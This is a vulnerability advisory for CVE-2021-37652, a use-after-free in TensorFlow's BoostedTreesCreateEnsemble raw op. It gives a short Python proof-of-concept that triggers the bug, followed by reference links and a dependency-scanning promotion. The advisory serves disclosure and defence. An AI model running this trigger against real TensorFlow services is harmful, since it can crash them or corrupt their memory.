CVE-2021-37652: Use after free in boosted trees creation
(updated )
The implementation for tf.raw_ops.BoostedTreesCreateEnsemble can result in a use after free error if an attacker supplies specially crafted arguments:
import tensorflow as tf
v= tf.Variable([0.0])
tf.raw_ops.BoostedTreesCreateEnsemble(
tree_ensemble_handle=v.handle,
stamp_token=[0],
tree_ensemble_serialized=['0'])
References
- github.com/advisories/GHSA-m7fm-4jfh-jrg6
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-565.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-763.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-274.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/5ecec9c6fbdbc6be03295685190a45e7eee726ab
- github.com/tensorflow/tensorflow/security/advisories/GHSA-m7fm-4jfh-jrg6
- nvd.nist.gov/vuln/detail/CVE-2021-37652
Detect and mitigate CVE-2021-37652 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →